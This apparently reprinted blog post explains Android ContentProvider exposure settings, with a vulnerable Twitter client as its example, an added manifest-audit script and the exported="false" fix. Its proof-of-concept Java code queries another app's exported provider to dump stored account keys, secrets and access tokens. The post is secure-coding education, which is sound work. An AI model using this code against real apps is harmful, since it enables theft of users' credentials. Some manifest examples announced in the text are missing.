The ContentProvider class provides a mechanism for managing and sharing data with other apps. When sharing provider data with other apps, you must implement access control carefully to prevent unauthorized access to sensitive data.
There are three methods to restrict access to ContentProvider:
Public
Private
Restricted access
[Public]
In the AndroidManifest.xml file, declaring the android:exported attribute makes a ContentProvider public to other apps. For versions earlier than Android API Level 16, a ContentProvider is public by default unless android:exported="false" is explicitly declared, for example:
If ContentProvider is set to Public, the data stored in ContentProvider can be accessed by other apps. Therefore, the design must ensure that only non-confidential information is disclosed.
[Private]
By declaring the android:exported attribute in the AndroidManifest.xml file, you can set a ContentProvider to Private. In Android API Level 17 and later versions, a ContentProvider is Private by default and does not need to be explicitly declared. For example:
If a ContentProvider does not need to share data with other apps, declare android:exported="false" in the manifest file. Note that in API Level 8 and earlier versions, even if you explicitly declare android:exported="false", the corresponding ContentProvider can still be accessed by other apps.
[Restricted Access]
To be continued
[Example code that does not meet security requirements]
MovatwiTouch is a Twitter client that uses a ContentProvider to manage the key, secret, and access token of Twitter users. However, this ContentProvider is Public, which allows other apps installed on the same mobile phone to obtain the sensitive information.
The provider declaration in the AndroidManifest.xml file below does not specify the android:exported attribute. Therefore, before API Level 16, this ContentProvider is made public.
[Proof of concept]
The following code demonstrates how the Public ContentProvider vulnerability is exploited.
// check whether movatwi is installed.
try {
    ApplicationInfo info = getPackageManager().getApplicationInfo("jp.co.vulnerable", 0);
} catch (NameNotFoundException e) {
    Log.w(TAG, "the app is not installed.");
    return;
}
// extract account data through content provider
Uri uri = Uri.parse("content://jp.co.vulnerable.accountprovider");
Cursor cur = getContentResolver().query(uri, null, null, null, null);
StringBuilder sb = new StringBuilder();
if (cur != null) {
    int ri = 0;
    while (cur.moveToNext()) {
        ++ri;
        Log.i(TAG, String.format("row[%d]:", ri));
        sb.setLength(0);
        for (int i = 0; i < cur.getColumnCount(); ++i) {
            String column = cur.getColumnName(i);
            String value = cur.getString(i);
            if (value != null) {
                // strip line breaks so each value is logged on one line
                value = value.replaceAll("[\r\n]", "");
            }
            Log.i(TAG, String.format("%s:%s", column, value));
        }
    }
    cur.close();
} else {
    Log.i(TAG, "Can't get the app information.");
}
[Solution]
In the AndroidManifest.xml file, explicitly declare the following for the ContentProvider:
android:exported="false"
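To check a project for providers that rely on the platform default, the following Python script (an added example, not code from the original article) reads a source AndroidManifest.xml and reports each provider's effective exposure. The sample manifest is constructed, its package and provider names are hypothetical, the finding labels are this example's own, and the API level 16 threshold follows the Android documentation (min or target SDK 16 or lower).

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"
# Android docs: exported defaults to true when min or target SDK is 16 or lower.
PUBLIC_BY_DEFAULT_MAX_API = 16

# Constructed sample manifest; package and provider names are hypothetical.
SAMPLE_MANIFEST = """<manifest
    xmlns:android="http://schemas.android.com/apk/res/android">
  <uses-sdk android:minSdkVersion="10" android:targetSdkVersion="19"/>
  <application>
    <provider android:name=".AccountProvider"
              android:authorities="com.example.sample.accounts"/>
    <provider android:name=".CacheProvider" android:exported="false"
              android:authorities="com.example.sample.cache"/>
    <provider android:name=".ShareProvider" android:exported="true"
              android:authorities="com.example.sample.share"/>
  </application>
</manifest>"""


def audit_providers(manifest_xml):
    """Map each <provider> name to its effective exposure."""
    root = ET.fromstring(manifest_xml)
    sdk = root.find("uses-sdk")
    min_sdk = target_sdk = 1  # platform default when <uses-sdk> is absent
    if sdk is not None:
        min_sdk = int(sdk.get(ANDROID + "minSdkVersion", "1"))
        target_sdk = int(sdk.get(ANDROID + "targetSdkVersion", min_sdk))
    default_public = min(min_sdk, target_sdk) <= PUBLIC_BY_DEFAULT_MAX_API
    findings = {}
    for provider in root.iter("provider"):
        name = provider.get(ANDROID + "name", "<unnamed>")
        exported = (provider.get(ANDROID + "exported") or "").strip().lower()
        if exported == "":
            findings[name] = "implicit-public" if default_public else "implicit-private"
        elif exported == "true":
            findings[name] = "explicit-public"
        elif exported == "false":
            # The article notes exported="false" is not honoured on API level 8 and earlier.
            findings[name] = "private-except-api8" if min_sdk <= 8 else "explicit-private"
        else:  # e.g. a resource reference that must be resolved by hand
            findings[name] = "unresolved"
    return findings


if __name__ == "__main__":
    for name, finding in audit_providers(SAMPLE_MANIFEST).items():
        print(f"{finding:20} {name}")
```

Any provider reported as implicit-public is one where the manifest should state android:exported explicitly.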
-- Welcome to reprint, please indicate the source of http://blog.csdn.net/asce1885, do not use for commercial purposes without my consent, thank you --